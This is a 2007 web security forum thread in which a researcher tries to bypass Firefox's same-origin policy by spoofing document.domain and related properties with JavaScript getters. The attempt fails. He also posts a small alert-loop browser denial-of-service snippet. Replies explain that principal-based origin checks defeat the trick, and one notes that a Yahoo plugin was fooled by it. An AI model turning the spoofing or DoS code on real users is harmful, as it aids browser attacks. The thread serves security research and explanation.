Hacking Firefox
Posted by: Gareth Heyes
Date: November 12, 2007 09:03AM

Well I've been bored over the last few days and I thought I'd have a bash at Firefox's same origin policy. So far I think I've nearly cracked it; I just can't find a way to spoof the location object. Anyone any ideas?

Check out the following code in Firebug:-
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Firefox hacking</title>
<script type="text/javascript">
// Shared by the handlers below (they were implicit globals in the original).
var newElement, req;

window.onload = function() {
	// Load a cross-origin page in an iframe, then override the script-visible
	// origin-related properties of this document with getters claiming to be google.co.uk.
	newElement = document.createElement('iframe');
	newElement.src = 'http://www.google.co.uk/';
	newElement.id = 'sourceCode';
	document.__defineGetter__("domain", function() { return 'www.google.co.uk'; });
	document.__defineGetter__("URL", function() { return 'http://www.google.co.uk/'; });
	document.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'; });
	document.documentElement.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'; });
	newElement.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'; });
	document.body.appendChild(newElement);
	//newElement.__defineGetter__("nodeName", function() { return 'body'; });
	//newElement.__defineGetter__("localName", function() { return 'body'; });
	// Give the iframe time to load before probing it.
	setTimeout(getContent, 5000);
}

function getContent() {
	document.__defineGetter__("strictErrorChecking", function() { return false; });
	document.__defineGetter__("documentURI", function() { return 'http://www.google.co.uk/'; });
	/* Cross-origin XMLHttpRequest attempt, left disabled:
	req = createAjaxRequest();
	req.onreadystatechange = reqChange;
	try {
		req.open("GET", 'http://www.google.co.uk/', true);
	} catch(err) {
		alert(err);
	}
	req.send(null);
	*/
	// The actual cross-origin access; this is the line that raises the security error.
	alert(newElement.contentWindow.document.body);
	// Dump the iframe element's own (same-origin) properties into the page.
	var str = '';
	var textContent = document.getElementById('textContent');
	for (var i in newElement) {
		str += i + '=' + newElement[i] + '<br>';
	}
	textContent.innerHTML = str;
}

function grabInfo() {
	alert(1);
}

function reqChange() {
	alert(2);
	if (req.readyState == 4) {
		if (req.status == 200) {
			grabInfo();
		} else {
			alert("There was a problem retrieving the XML data:\n" + req.statusText);
		}
	}
}

// Browser-independent XMLHttpRequest factory (IE ActiveX fallbacks first).
function createAjaxRequest() {
	try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) {}
	try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {}
	try { return new XMLHttpRequest(); } catch (e) {}
	alert("XMLHttpRequest not supported");
	return null;
}

window.onerror = function() {
	//alert(newElement.contentWindow.document.body);
	//return true;
}
</script>
</head>

<body>
<div id="textContent"></div>
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 12, 2007 09:31AM

// legacy Mozilla "getter =" syntax - doesn't work :(
document.location getter = new Function();
// __defineGetter__ on the document - doesn't work :(
document.__defineGetter__("location", function() { return 'http://www.google.co.uk/'; });
// plain assignment - doesn't work :( (assigning to location navigates instead)
document.location = function() { return null; }

Seems close, I keep getting security 1000 errors. Maybe it's not possible to exploit just domain spoofing etc.

Re: Hacking Firefox
Posted by: kirke
Date: November 13, 2007 02:13AM

did you check http://developer.mozilla.org/en/docs/index.php?title=Core_JavaScript_1.5_Guide:Creating_New_Objects:Defining_Getters_and_Setters#Summary

Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 13, 2007 03:27AM

Hi kirke

Yeah, but the problem is that whenever you try and overwrite the location object it assumes it is a new location. I can spoof all other properties, and I was thinking that the location object was the only one left and maybe it would be possible to fool Firefox into bypassing the same origin policy. It might have some other security check, but I find it fun trying :)

Take the following example from the code above:
document.__defineGetter__("domain", function() { return 'www.google.co.uk'; });
alert('document.domain:' + document.domain);

Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 14, 2007 02:12PM

I've released a cool DoS based on this code on my blog :)

window.onload = function() {
	// Getter on the history object that enumerates its own properties,
	// raising an alert for each one (errors from the enumeration are swallowed).
	history.__defineGetter__("x", function() {
		for (i in this) {
			try {
				alert(this);
			} catch(e) {
			}
		}
	});

	// Reading the property triggers the getter.
	history.x;
}

Re: Hacking Firefox
Posted by: trev
Date: February 18, 2008 03:45AM

I am pretty late to the party but still - this cannot work. You can only modify the JavaScript wrappers of internal objects, the browser will access the objects directly however. Also, Firefox uses neither window.location nor document.domain for same-origin policy - policy enforcement in Firefox is always based on a principal object. The document is associated with a principal when it is created, and its scripts inherit this principal when they are compiled. After that the principal doesn't change any more and it isn't accessible from JavaScript either (not even indirectly from what I can tell).

Now that doesn't mean that the whole thing is fool-proof, the handling of principals in Firefox is everything but straightforward and it might be possible to create a situation where same-origin policy fails. But you certainly cannot get there by defining getters.

Interestingly however, you could fool Yahoo Application State Plugin with getters (not sure whether this still works). This plugin is installed automatically by Yahoo Messenger and is supposed to tell only Yahoo pages whether Messenger is installed and which version it is. The restriction to Yahoo pages worked via checking document.domain - and could be easily tricked with getters. Why Yahoo decided to call into JavaScript from a binary browser plugin is beyond me...

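To make trev's point concrete, here is an added example (not code from the thread or from Firefox) that models a principal fixed at creation beside a script-visible domain property; createDocument, naiveIsTrusted, principalIsTrusted and spoofDomain are stand-in names for this illustration, not browser APIs, and other.example is a constructed origin.

```javascript
// Added example, not code from the thread: a minimal model of why a getter on
// document.domain changes only what script sees, not what the browser enforces.

// Model a document the way trev describes Firefox doing it: the origin
// (principal) is fixed when the object is created and lives in a closure that
// page script cannot reach. `domain` is the JS-visible wrapper property.
function createDocument(origin) {
  const principal = Object.freeze({ origin });          // private, immutable
  const doc = { domain: new URL(origin).hostname };    // script-visible wrapper
  return {
    doc,
    // Privileged code gets a capability bound to the principal, never to `doc`.
    originOf: () => principal.origin,
  };
}

// Naive check, like the plugin in the thread: trusts a property the page
// can redefine with a getter.
function naiveIsTrusted(doc, trustedHost) {
  return doc.domain === trustedHost;
}

// Principal-based check: consults the origin captured at creation time.
function principalIsTrusted(originOf, trustedHost) {
  return new URL(originOf()).hostname === trustedHost;
}

// Page script redefining the visible property, as in the original post's
// document.__defineGetter__("domain", ...). Object.defineProperty is the
// standard equivalent of the legacy __defineGetter__.
function spoofDomain(doc, fakeHost) {
  Object.defineProperty(doc, 'domain', { get: () => fakeHost, configurable: true });
  return doc;
}

// Scenario (constructed): a page at other.example claims to be www.google.co.uk.
function scenario() {
  const { doc, originOf } = createDocument('http://other.example/');
  spoofDomain(doc, 'www.google.co.uk');
  return {
    visibleDomain: doc.domain,                              // 'www.google.co.uk'
    naive: naiveIsTrusted(doc, 'www.google.co.uk'),         // true: fooled
    principal: principalIsTrusted(originOf, 'www.google.co.uk'), // false: not fooled
  };
}
```

A component that decides trust from a value page script can reshape (document.domain, a getter-backed property) is making the plugin's mistake; the check has to consult state the page cannot redefine.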